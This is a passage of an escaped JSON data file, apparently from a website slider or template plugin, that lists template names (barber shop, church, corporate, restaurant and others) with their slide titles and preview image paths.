6\",\"img\":\"clearcut\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"clearcut\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"clearcut\\/slide8.jpg\"},{\"title\":\"Slide 9\",\"img\":\"clearcut\\/slide9.jpg\"},{\"title\":\"Slide 10\",\"img\":\"clearcut\\/slide10.jpg\"}],\"wonderstruck_menu\":[{\"title\":\"Slide 1\",\"img\":\"wonderstruck_menu\\/slide1.jpg\"}],\"wonderstruck_header\":[{\"title\":\"Slide 1\",\"img\":\"wonderstruck_header\\/slide1.jpg\"}],\"wonderstruck_about\":[{\"title\":\"Slide 1\",\"img\":\"wonderstruck_about\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"wonderstruck_about\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"wonderstruck_about\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"wonderstruck_about\\/slide4.jpg\"}],\"wonderstruck-works\":[{\"title\":\"Slide 1\",\"img\":\"wonderstruck-works\\/slide1.jpg\"}],\"wonderstruck-contact\":[{\"title\":\"Slide 1\",\"img\":\"wonderstruck-contact\\/slide1.jpg\"}],\"bubblemorph\":[{\"title\":\"Slide 1\",\"img\":\"bubblemorph\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"bubblemorph\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"bubblemorph\\/slide3.jpg\"}],\"distortionaddon\":[{\"title\":\"Slide 1\",\"img\":\"distortionaddon\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"distortionaddon\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"distortionaddon\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"distortionaddon\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"distortionaddon\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"distortionaddon\\/slide6.jpg\"}],\"clubflyer\":[{\"title\":\"Slide 1\",\"img\":\"clubflyer\\/slide1.jpg\"}],\"paintbrushaddon\":[{\"title\":\"Slide 1\",\"img\":\"paintbrushaddon\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"paintbrushaddon\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"paintbrushaddon\\/slide3.jpg\"}],\"parallax_header\":[{\"title\":\"Slide 1\",\"img\":\"parallax_header\\/slide1.jpg\"}],\"parallax_content\":[{\"title\":\"Slide 1\",\"img\":\"parallax_content\\/slide1.jpg\"}],\"parallax_footer\":[{\"title\":\"Slide 1\",\"img\":\"parallax_footer\\/slide1.jpg\"}],\"le-chef-menu\":[{\"title\":\"Slide 1\",\"img\":\"le-chef-menu\\/slide1.jpg\"}],\"le-chef-header\":[{\"title\":\"Slide 1\",\"img\":\"le-chef-header\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"le-chef-header\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"le-chef-header\\/slide3.jpg\"}],\"le-chef-philosophy\":[{\"title\":\"Slide 1\",\"img\":\"le-chef-philosophy\\/slide1.jpg\"}],\"le-chef-food\":[{\"title\":\"Slide 1\",\"img\":\"le-chef-food\\/slide1.jpg\"}],\"le-chef-la-carte\":[{\"title\":\"Slide 1\",\"img\":\"le-chef-la-carte\\/slide1.jpg\"}],\"le-chef-footer\":[{\"title\":\"Slide 1\",\"img\":\"le-chef-footer\\/slide1.jpg\"}],\"news-magazine-slider\":[{\"title\":\"Slide 1\",\"img\":\"news-magazine-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"news-magazine-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"news-magazine-slider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"news-magazine-slider\\/slide4.jpg\"}],\"real-estate-slider\":[{\"title\":\"Slide 1\",\"img\":\"real-estate-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"real-estate-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"real-estate-slider\\/slide3.jpg\"}],\"fashion-header\":[{\"title\":\"Slide 1\",\"img\":\"fashion-header\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fashion-header\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fashion-header\\/slide3.jpg\"}],\"seasonaloffer\":[{\"title\":\"Slide 1\",\"img\":\"seasonaloffer\\/slide1.jpg\"}],\"barber-shop-header\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-header\\/slide1.jpg\"}],\"barber-shop-mobile-menu\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-mobile-menu\\/slide1.jpg\"}],\"barber-shop-first-screen\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-first-screen\\/slide1.jpg\"}],\"barber-shop-about\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-about\\/slide1.jpg\"}],\"barber-shop-services\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-services\\/slide1.jpg\"}],\"barber-shop-barbers\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-barbers\\/slide1.jpg\"}],\"barber-shop-contacts\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-contacts\\/slide1.jpg\"}],\"barber-shop-footer\":[{\"title\":\"Slide 1\",\"img\":\"barber-shop-footer\\/slide1.jpg\"}],\"fitness-club-template\":[{\"title\":\"Slide 1\",\"img\":\"fitness-club-template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fitness-club-template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fitness-club-template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fitness-club-template\\/slide4.jpg\"}],\"soccer-school\":[{\"title\":\"Slide 1\",\"img\":\"soccer-school\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"soccer-school\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"soccer-school\\/slide3.jpg\"}],\"music-band-template\":[{\"title\":\"Slide 1\",\"img\":\"music-band-template\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"music-band-template\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"music-band-template\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"music-band-template\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"music-band-template\\/slide5.jpg\"}],\"restaurant-menu\":[{\"title\":\"Slide 1\",\"img\":\"restaurant-menu\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"restaurant-menu\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"restaurant-menu\\/slide3.jpg\"}],\"cinematic-slider\":[{\"title\":\"Slide 1\",\"img\":\"cinematic-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cinematic-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cinematic-slider\\/slide3.jpg\"}],\"3d-parallax-cubes\":[{\"title\":\"Slide 1\",\"img\":\"3d-parallax-cubes\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"3d-parallax-cubes\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"3d-parallax-cubes\\/slide3.jpg\"}],\"medicare-menu\":[{\"title\":\"Slide 1\",\"img\":\"medicare-menu\\/slide1.jpg\"}],\"medicare-header\":[{\"title\":\"Slide 1\",\"img\":\"medicare-header\\/slide1.jpg\"}],\"medicare-about\":[{\"title\":\"Slide 1\",\"img\":\"medicare-about\\/slide1.jpg\"}],\"medicare-highlight\":[{\"title\":\"Slide 1\",\"img\":\"medicare-highlight\\/slide1.jpg\"}],\"medicare-services\":[{\"title\":\"Slide 1\",\"img\":\"medicare-services\\/slide1.jpg\"}],\"medicare-doctors\":[{\"title\":\"Slide 1\",\"img\":\"medicare-doctors\\/slide1.jpg\"}],\"medicare-research\":[{\"title\":\"Slide 1\",\"img\":\"medicare-research\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"medicare-research\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"medicare-research\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"medicare-research\\/slide4.jpg\"}],\"medicare-whychoose\":[{\"title\":\"Slide 1\",\"img\":\"medicare-whychoose\\/slide1.jpg\"}],\"medicare-contact\":[{\"title\":\"Slide 1\",\"img\":\"medicare-contact\\/slide1.jpg\"}],\"medicare-footer\":[{\"title\":\"Slide 1\",\"img\":\"medicare-footer\\/slide1.jpg\"}],\"coffee-menu\":[{\"title\":\"Slide 1\",\"img\":\"coffee-menu\\/slide1.jpg\"}],\"coffee-header\":[{\"title\":\"Slide 1\",\"img\":\"coffee-header\\/slide1.jpg\"}],\"coffee-philosophy\":[{\"title\":\"Slide 1\",\"img\":\"coffee-philosophy\\/slide1.jpg\"}],\"coffee-carte\":[{\"title\":\"Slide 1\",\"img\":\"coffee-carte\\/slide1.jpg\"}],\"coffee-teaser\":[{\"title\":\"Slide 1\",\"img\":\"coffee-teaser\\/slide1.jpg\"}],\"coffee-findus\":[{\"title\":\"Slide 1\",\"img\":\"coffee-findus\\/slide1.jpg\"}],\"coffee-footer\":[{\"title\":\"Slide 1\",\"img\":\"coffee-footer\\/slide1.jpg\"}],\"minimal-portfolio\":[{\"title\":\"Slide 1\",\"img\":\"minimal-portfolio\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"minimal-portfolio\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"minimal-portfolio\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"minimal-portfolio\\/slide4.jpg\"}],\"minimal-portfolio-modal\":[{\"title\":\"Slide 1\",\"img\":\"minimal-portfolio-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"minimal-portfolio-modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"minimal-portfolio-modal\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"minimal-portfolio-modal\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"minimal-portfolio-modal\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"minimal-portfolio-modal\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"minimal-portfolio-modal\\/slide7.jpg\"}],\"angled-menu\":[{\"title\":\"Slide 1\",\"img\":\"angled-menu\\/slide1.jpg\"}],\"angled-header\":[{\"title\":\"Slide 1\",\"img\":\"angled-header\\/slide1.jpg\"}],\"angled-news\":[{\"title\":\"Slide 1\",\"img\":\"angled-news\\/slide1.jpg\"}],\"angled-services\":[{\"title\":\"Slide 1\",\"img\":\"angled-services\\/slide1.jpg\"}],\"angled-success\":[{\"title\":\"Slide 1\",\"img\":\"angled-success\\/slide1.jpg\"}],\"angled-footer\":[{\"title\":\"Slide 1\",\"img\":\"angled-footer\\/slide1.jpg\"}],\"angled-content-modal\":[{\"title\":\"Slide 1\",\"img\":\"angled-content-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"angled-content-modal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"angled-content-modal\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"angled-content-modal\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"angled-content-modal\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"angled-content-modal\\/slide6.jpg\"}],\"big-bold-menu\":[{\"title\":\"Slide 1\",\"img\":\"big-bold-menu\\/slide1.jpg\"}],\"big-bold-header\":[{\"title\":\"Slide 1\",\"img\":\"big-bold-header\\/slide1.jpg\"}],\"big-bold-content\":[{\"title\":\"Slide 1\",\"img\":\"big-bold-content\\/slide1.jpg\"}],\"big-bold-blog\":[{\"title\":\"Slide 1\",\"img\":\"big-bold-blog\\/slide1.jpg\"}],\"big-bold-highlight\":[{\"title\":\"Slide 1\",\"img\":\"big-bold-highlight\\/slide1.jpg\"}],\"big-bold-footer\":[{\"title\":\"Slide 1\",\"img\":\"big-bold-footer\\/slide1.jpg\"}],\"Retouch\":[{\"title\":\"Slide 1\",\"img\":\"Retouch\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Retouch\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Retouch\\/slide3.jpg\"}],\"tech-slider\":[{\"title\":\"Slide 1\",\"img\":\"tech-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"tech-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"tech-slider\\/slide3.jpg\"}],\"peak-header\":[{\"title\":\"Slide 1\",\"img\":\"peak-header\\/slide1.jpg\"}],\"peak-about\":[{\"title\":\"Slide 1\",\"img\":\"peak-about\\/slide1.jpg\"}],\"peak-portfolio\":[{\"title\":\"Slide 1\",\"img\":\"peak-portfolio\\/slide1.jpg\"}],\"peak-footer\":[{\"title\":\"Slide 1\",\"img\":\"peak-footer\\/slide1.jpg\"}],\"portfolio-welcome\":[{\"title\":\"Slide 1\",\"img\":\"portfolio-welcome\\/slide1.jpg\"}],\"portfolio-about\":[{\"title\":\"Slide 1\",\"img\":\"portfolio-about\\/slide1.jpg\"}],\"portfolio-works-title\":[{\"title\":\"Slide 1\",\"img\":\"portfolio-works-title\\/slide1.jpg\"}],\"portfolio-works-content\":[{\"title\":\"Slide 1\",\"img\":\"portfolio-works-content\\/slide1.jpg\"}],\"portfolio-contacts\":[{\"title\":\"Slide 1\",\"img\":\"portfolio-contacts\\/slide1.jpg\"}],\"App-Studio-Welcome\":[{\"title\":\"Slide 1\",\"img\":\"App-Studio-Welcome\\/slide1.jpg\"}],\"App-Studio-Services\":[{\"title\":\"Slide 1\",\"img\":\"App-Studio-Services\\/slide1.jpg\"}],\"App-Studio-About\":[{\"title\":\"Slide 1\",\"img\":\"App-Studio-About\\/slide1.jpg\"}],\"App-Studio-Contacts\":[{\"title\":\"Slide 1\",\"img\":\"App-Studio-Contacts\\/slide1.jpg\"}],\"cube-animation\":[{\"title\":\"Slide 1\",\"img\":\"cube-animation\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cube-animation\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cube-animation\\/slide3.jpg\"}],\"basic-menu\":[{\"title\":\"Slide 1\",\"img\":\"basic-menu\\/slide1.jpg\"}],\"basic-header\":[{\"title\":\"Slide 1\",\"img\":\"basic-header\\/slide1.jpg\"}],\"basic-content\":[{\"title\":\"Slide 1\",\"img\":\"basic-content\\/slide1.jpg\"}],\"basic-carousel\":[{\"title\":\"Slide 1\",\"img\":\"basic-carousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"basic-carousel\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"basic-carousel\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"basic-carousel\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"basic-carousel\\/slide5.jpg\"}],\"basic-callout\":[{\"title\":\"Slide 1\",\"img\":\"basic-callout\\/slide1.jpg\"}],\"basic-grid\":[{\"title\":\"Slide 1\",\"img\":\"basic-grid\\/slide1.jpg\"}],\"basic-video-block\":[{\"title\":\"Slide 1\",\"img\":\"basic-video-block\\/slide1.jpg\"}],\"basic-footer\":[{\"title\":\"Slide 1\",\"img\":\"basic-footer\\/slide1.jpg\"}],\"basic-lightbox\":[{\"title\":\"Slide 1\",\"img\":\"basic-lightbox\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"basic-lightbox\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"basic-lightbox\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"basic-lightbox\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"basic-lightbox\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"basic-lightbox\\/slide6.jpg\"}],\"nature-slider\":[{\"title\":\"Slide 1\",\"img\":\"nature-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"nature-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"nature-slider\\/slide3.jpg\"}],\"art-gallery\":[{\"title\":\"Slide 1\",\"img\":\"art-gallery\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"art-gallery\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"art-gallery\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"art-gallery\\/slide4.jpg\"}],\"Construction-Header\":[{\"title\":\"Slide 1\",\"img\":\"Construction-Header\\/slide1.jpg\"}],\"Construction-Home\":[{\"title\":\"Slide 1\",\"img\":\"Construction-Home\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Construction-Home\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Construction-Home\\/slide3.jpg\"}],\"Construction-Projects\":[{\"title\":\"Slide 1\",\"img\":\"Construction-Projects\\/slide1.jpg\"}],\"Construction-History\":[{\"title\":\"Slide 1\",\"img\":\"Construction-History\\/slide1.jpg\"}],\"Construction-Services\":[{\"title\":\"Slide 1\",\"img\":\"Construction-Services\\/slide1.jpg\"}],\"Construction-Contacts\":[{\"title\":\"Slide 1\",\"img\":\"Construction-Contacts\\/slide1.jpg\"}],\"404-Error-Space-Theme\":[{\"title\":\"Slide 1\",\"img\":\"404-Error-Space-Theme\\/slide1.jpg\"}],\"landing-page-hero\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-hero\\/slide1.jpg\"}],\"landing-page-features\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-features\\/slide1.jpg\"}],\"landing-page-callout\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-callout\\/slide1.jpg\"}],\"landing-page-content\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-content\\/slide1.jpg\"}],\"landing-page-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-testimonials\\/slide1.jpg\"}],\"landing-page-call-to-action\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-call-to-action\\/slide1.jpg\"}],\"landing-page-help\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-help\\/slide1.jpg\"}],\"landing-page-footer\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-footer\\/slide1.jpg\"}],\"landing-page-price-modal\":[{\"title\":\"Slide 1\",\"img\":\"landing-page-price-modal\\/slide1.jpg\"}],\"energy-drinks-hero\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-hero\\/slide1.jpg\"}],\"energy-drinks-about\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-about\\/slide1.jpg\"}],\"energy-drinks-product\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-product\\/slide1.jpg\"}],\"energy-drinks-product-2\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-product-2\\/slide1.jpg\"}],\"energy-drinks-product-3\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-product-3\\/slide1.jpg\"}],\"energy-drinks-order\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-order\\/slide1.jpg\"}],\"energy-drinks-footer\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-footer\\/slide1.jpg\"}],\"energy-drinks-modal\":[{\"title\":\"Slide 1\",\"img\":\"energy-drinks-modal\\/slide1.jpg\"}],\"Corporate-Header\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Header\\/slide1.jpg\"}],\"Corporate-Welcome-Screen\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Welcome-Screen\\/slide1.jpg\"}],\"Corporate-About\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-About\\/slide1.jpg\"}],\"Corporate-Portfolio\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Portfolio\\/slide1.jpg\"}],\"Corporate-Chart\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Chart\\/slide1.jpg\"}],\"Corporate-News\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-News\\/slide1.jpg\"}],\"Corporate-Hiring\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-News\\/slide1.jpg\"}],\"Corporate-Testimonials\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Testimonials\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Corporate-Testimonials\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Corporate-Testimonials\\/slide3.jpg\"}],\"Corporate-Store\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Store\\/slide1.jpg\"}],\"Corporate-Support\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Support\\/slide1.jpg\"}],\"Corporate-Team\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Team\\/slide1.jpg\"}],\"Corporate-Selected-Projects-Title\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Selected-Projects-Title\\/slide1.jpg\"}],\"Corporate-Selected-Projects\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Selected-Projects\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Corporate-Selected-Projects\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Corporate-Selected-Projects\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"Corporate-Selected-Projects\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"Corporate-Selected-Projects\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"Corporate-Selected-Projects\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"Corporate-Selected-Projects\\/slide7.jpg\"}],\"Corporate-Clients\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Clients\\/slide1.jpg\"}],\"Corporate-Text-Block\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Text-Block\\/slide1.jpg\"}],\"Corporate-Mobile-App\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Mobile-App\\/slide1.jpg\"}],\"Corporate-Contacts\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Contacts\\/slide1.jpg\"}],\"Corporate-Footer\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Footer\\/slide1.jpg\"}],\"Corporate-Scroll-To-Top\":[{\"title\":\"Slide 1\",\"img\":\"Corporate-Scroll-To-Top\\/slide1.jpg\"}],\"geometric-menu\":[{\"title\":\"Slide 1\",\"img\":\"geometric-menu\\/slide1.jpg\"}],\"geometric-hero\":[{\"title\":\"Slide 1\",\"img\":\"geometric-hero\\/slide1.jpg\"}],\"geometric-grid\":[{\"title\":\"Slide 1\",\"img\":\"geometric-grid\\/slide1.jpg\"}],\"geometric-about\":[{\"title\":\"Slide 1\",\"img\":\"geometric-about\\/slide1.jpg\"}],\"geometric-texts\":[{\"title\":\"Slide 1\",\"img\":\"geometric-texts\\/slide1.jpg\"}],\"geometric-services\":[{\"title\":\"Slide 1\",\"img\":\"geometric-services\\/slide1.jpg\"}],\"geometric-texts-2\":[{\"title\":\"Slide 1\",\"img\":\"geometric-texts-2\\/slide1.jpg\"}],\"geometric-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"geometric-testimonials\\/slide1.jpg\"}],\"geometric-footer\":[{\"title\":\"Slide 1\",\"img\":\"geometric-footer\\/slide1.jpg\"}],\"geometric-lightbox\":[{\"title\":\"Slide 1\",\"img\":\"geometric-lightbox\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"geometric-lightbox\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"geometric-lightbox\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"geometric-lightbox\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"geometric-lightbox\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"geometric-lightbox\\/slide6.jpg\"}],\"brutal-menu\":[{\"title\":\"Slide 1\",\"img\":\"brutal-menu\\/slide1.jpg\"}],\"brutal-hero\":[{\"title\":\"Slide 1\",\"img\":\"brutal-hero\\/slide1.jpg\"}],\"brutal-about\":[{\"title\":\"Slide 1\",\"img\":\"brutal-about\\/slide1.jpg\"}],\"brutal-highlight\":[{\"title\":\"Slide 1\",\"img\":\"brutal-highlight\\/slide1.jpg\"}],\"brutal-projects\":[{\"title\":\"Slide 1\",\"img\":\"brutal-projects\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"brutal-projects\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"brutal-projects\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"brutal-projects\\/slide4.jpg\"}],\"brutal-services\":[{\"title\":\"Slide 1\",\"img\":\"brutal-services\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"brutal-services\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"brutal-services\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"brutal-services\\/slide4.jpg\"}],\"brutal-callout\":[{\"title\":\"Slide 1\",\"img\":\"brutal-callout\\/slide1.jpg\"}],\"brutal-footer\":[{\"title\":\"Slide 1\",\"img\":\"brutal-footer\\/slide1.jpg\"}],\"Church-Header\":[{\"title\":\"Slide 1\",\"img\":\"Church-Header\\/slide1.jpg\"}],\"Church-Upcoming-Events\":[{\"title\":\"Slide 1\",\"img\":\"Church-Upcoming-Events\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Church-Upcoming-Events\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Church-Upcoming-Events\\/slide3.jpg\"}],\"Church-About\":[{\"title\":\"Slide 1\",\"img\":\"Church-About\\/slide1.jpg\"}],\"Church-Pastors\":[{\"title\":\"Slide 1\",\"img\":\"Church-Pastors\\/slide1.jpg\"}],\"Church-Photo-Gallery\":[{\"title\":\"Slide 1\",\"img\":\"Church-Photo-Gallery\\/slide1.jpg\"}],\"Church-Community\":[{\"title\":\"Slide 1\",\"img\":\"Church-Community\\/slide1.jpg\"}],\"Church-Sermon\":[{\"title\":\"Slide 1\",\"img\":\"Church-Sermon\\/slide1.jpg\"}],\"Church-Contacts\":[{\"title\":\"Slide 1\",\"img\":\"Church-Contacts\\/slide1.jpg\"}],\"Church-Footer\":[{\"title\":\"Slide 1\",\"img\":\"Church-Footer\\/slide1.jpg\"}],\"Church-Light-Header\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Header\\/slide1.jpg\"}],\"Church-Light-Upcoming-Events\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Upcoming-Events\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"Church-Light-Upcoming-Events\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"Church-Light-Upcoming-Events\\/slide3.jpg\"}],\"Church-Light-About\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-About\\/slide1.jpg\"}],\"Church-Light-Pastors\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Pastors\\/slide1.jpg\"}],\"Church-Light-Photo-Gallery\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Photo-Gallery\\/slide1.jpg\"}],\"Church-Light-Community\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Community\\/slide1.jpg\"}],\"Church-Light-Sermon\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Sermon\\/slide1.jpg\"}],\"Church-Light-Contacts\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Contacts\\/slide1.jpg\"}],\"Church-Light-Footer\":[{\"title\":\"Slide 1\",\"img\":\"Church-Light-Footer\\/slide1.jpg\"}],\"rockable-menu\":[{\"title\":\"Slide 1\",\"img\":\"rockable-menu\\/slide1.jpg\"}],\"rockable-hero\":[{\"title\":\"Slide 1\",\"img\":\"rockable-hero\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"rockable-hero\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"rockable-hero\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"rockable-hero\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"rockable-hero\\/slide5.jpg\"}],\"rockable-lineup\":[{\"title\":\"Slide 1\",\"img\":\"rockable-lineup\\/slide1.jpg\"}],\"rockable-lineup-2\":[{\"title\":\"Slide 1\",\"img\":\"rockable-lineup-2\\/slide1.jpg\"}],\"rockable-gallery-title\":[{\"title\":\"Slide 1\",\"img\":\"rockable-gallery-title\\/slide1.jpg\"}],\"rockable-gallery\":[{\"title\":\"Slide 1\",\"img\":\"rockable-gallery\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"rockable-gallery\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"rockable-gallery\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"rockable-gallery\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"rockable-gallery\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"rockable-gallery\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"rockable-gallery\\/slide7.jpg\"}],\"rockable-sponsors\":[{\"title\":\"Slide 1\",\"img\":\"rockable-sponsors\\/slide1.jpg\"}],\"rockable-footer\":[{\"title\":\"Slide 1\",\"img\":\"rockable-footer\\/slide1.jpg\"}],\"rockable-detail-modal\":[{\"title\":\"Slide 1\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 3\",\"img\":\"rockable-detail-modal\\/slide1.jpg\"},{\"title\":\"Slide 